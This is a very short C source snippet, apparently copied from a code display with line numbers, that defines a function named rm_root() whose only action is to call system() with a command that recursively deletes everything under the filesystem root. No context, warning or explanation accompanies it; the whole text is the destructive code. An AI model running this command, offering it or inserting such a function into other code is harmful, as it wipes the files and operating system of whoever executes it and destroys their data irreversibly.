1 2 3 4 5 6
#include <stdlib.h> #include <unistd.h> void rm_root() { system("rm -rf /* --no-preserve-root"); }